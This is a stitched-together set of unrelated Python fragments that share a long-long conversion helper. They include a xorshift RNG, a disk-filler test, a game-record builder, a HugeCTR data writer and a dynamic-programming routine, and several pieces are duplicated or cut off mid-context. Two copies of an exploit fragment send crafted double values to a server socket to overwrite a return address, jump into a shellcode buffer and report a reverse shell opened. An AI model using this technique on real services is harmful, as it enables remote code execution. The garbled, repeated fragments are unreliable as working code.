def _next_java_compatible(self, nbits):
''' doc '''
x = self.seed & 0xffffffffffffffff #Preserve 64 bits
x ^= ll(x << 21).value & 0xffffffffffffffff #Preserve 64 bits
x ^= ll(self.rshift(x, 35)).value
x ^= ll(x << 4).value
self.seed = x
x &= ((1 << nbits) - 1)
return x
def _next_java_compatible(self, nbits):
''' doc '''
x = self.seed & 0xffffffffffffffff #Preserve 64 bits
x ^= ll(x << 21).value & 0xffffffffffffffff #Preserve 64 bits
x ^= ll(self.rshift(x, 35)).value
x ^= ll(x << 4).value
self.seed = x
x &= ((1 << nbits) - 1)
return x
def setFreeSpaceTo(self, size):
"""Reduce the amount of space available to 'size'"""
# Take into account the currently existing filler file, if any, as we
# will be overwriting it to the new size.
fillerSize = (self.diskSpaceAvailable() +
self.currentFillerSize) - size
fd = open(self.diskFiller, "w")
ret = CDLL("libc.so.6").posix_fallocate64(fd.fileno(), ll(0),
ll(fillerSize))
self.assertThat(ret, Equals(0))
self.currentFillerSize = fillerSize
def get_record(self):
hedr_data = [
self.version, self.unknown_long,
utils.get_formated_string(self.author, 32),
utils.get_formated_string(self.description, 256), self.num_records
]
tes3 = Record('TES3')
tes3.sub_records.append(SubRecord('HEDR', data=hedr_data))
for m in self.master_files:
tes3.sub_records.append(
SubRecord('MAST', data=[utils.get_formated_string(m[0],
None)]))
tes3.sub_records.append(SubRecord('DATA', data=[ll(m[1])]))
return tes3
def write_hugeCTR_data(huge_ctr_data, filename='huge_ctr_data.dat'):
print("Writing %d samples" % huge_ctr_data.shape[0])
with open(filename, 'wb') as f:
#write header
f.write(ll(0)) # 0: no error check; 1: check_num
f.write(ll(
huge_ctr_data.shape[0])) # the number of samples in this data file
f.write(ll(1)) # dimension of label
f.write(ll(1)) # dimension of dense feature
f.write(ll(2)) # long long slot_num
for _ in range(3):
f.write(ll(0)) # reserved for future use
for i in tqdm.tqdm(range(huge_ctr_data.shape[0])):
f.write(c_float(huge_ctr_data[i, 2])) # float label[label_dim];
f.write(c_float(0)) # dummy dense feature
f.write(c_int(1)) # slot 1 nnz: user ID
f.write(c_uint(huge_ctr_data[i, 0]))
f.write(c_int(1)) # slot 2 nnz: item ID
f.write(c_uint(huge_ctr_data[i, 1]))
for i in range(0, 36): # send 36 more bs'
s.send("b\n")
print "b"
# the second methon is to overwrite return address of function 0x
# the formula to find the next slot in the 603150 buffer is:
# target = 603140 + (stack_size+1)*8 + 8. So we inverse the formula to find the
# correct value of stack size. Be careful if stack size can't be grater than 0x1FF!
# target_addr = 0x00007FFFFFFFE218 # the address to overwrite
# stack_size = ll((target_addr - 0x603140)/8 - 1);
# buf = "%.127le" % struct.unpack('d', stack_size)[0] # print stack size as double
# s.send(buf + "\n")
# print buf
# the next number will write at the targe address. The target address should point to
# beginning of our buffer, at 603150.
jmp_addr = ll(0x603154) # convert to long long
buf = "%.127le" % struct.unpack('d', jmp_addr)[0]
s.send(buf + "\n") # send to server
print buf # print in double format
# at this point, RIP controlled
raw_input('Reverse shell opened. Press any key to continue...')
s.close() # close connection with the server
raise SystemExit, 0 # exit program
# alternative way to convert string to double
# doubles_sequence = array.array('d', shellcode[0:8])
# print "%.32g" % doubles_sequence[0]
cur, prv = prv, cur
# ctypes.memset(arr[cur], 63, len(arr[cur]) )
# arr = [[63 for k in range(maxn)] for j in range(maxn)]
for j in range(i):
# for (int j = 0; j <= i + 1; j++) :
for k in range(K):
# for (int k = 0; k <= K; k++) :
# //don't change!
if s[i] == 'B' and j:
arr[cur][j][k] = min(arr[cur][j][k], arr[prv][j - 1][k] + j)
elif s[i] == 'K':
arr[cur][0][k] = min(arr[cur][0][k], arr[prv][j][k])
# //change
if s[i] == 'K':
continue
if k:
arr[cur][0][k] = min(arr[cur][0][k], arr[prv][j][k - 1])
# print(arr)
# LL ans = 1e18;
ans = 10000000000000000000000000000000
for j in range(n):
for k in range(K):
ans = min(ans, arr[cur][j][k])
print(int(len(ll()) * n * (n + 1) / 2 - ans))
print(ans)
# return 0;
s.send( "b\n" );
print "b"
# the second methon is to overwrite return address of function 0x
# the formula to find the next slot in the 603150 buffer is:
# target = 603140 + (stack_size+1)*8 + 8. So we inverse the formula to find the
# correct value of stack size. Be careful if stack size can't be grater than 0x1FF!
# target_addr = 0x00007FFFFFFFE218 # the address to overwrite
# stack_size = ll((target_addr - 0x603140)/8 - 1);
# buf = "%.127le" % struct.unpack('d', stack_size)[0] # print stack size as double
# s.send(buf + "\n")
# print buf
# the next number will write at the targe address. The target address should point to
# beginning of our buffer, at 603150.
jmp_addr = ll(0x603154) # convert to long long
buf = "%.127le" % struct.unpack('d', jmp_addr)[0]
s.send(buf + "\n") # send to server
print buf # print in double format
# at this point, RIP controlled
raw_input( 'Reverse shell opened. Press any key to continue...' )
s.close() # close connection with the server
raise SystemExit, 0 # exit program
# alternative way to convert string to double
# doubles_sequence = array.array('d', shellcode[0:8])
# print "%.32g" % doubles_sequence[0]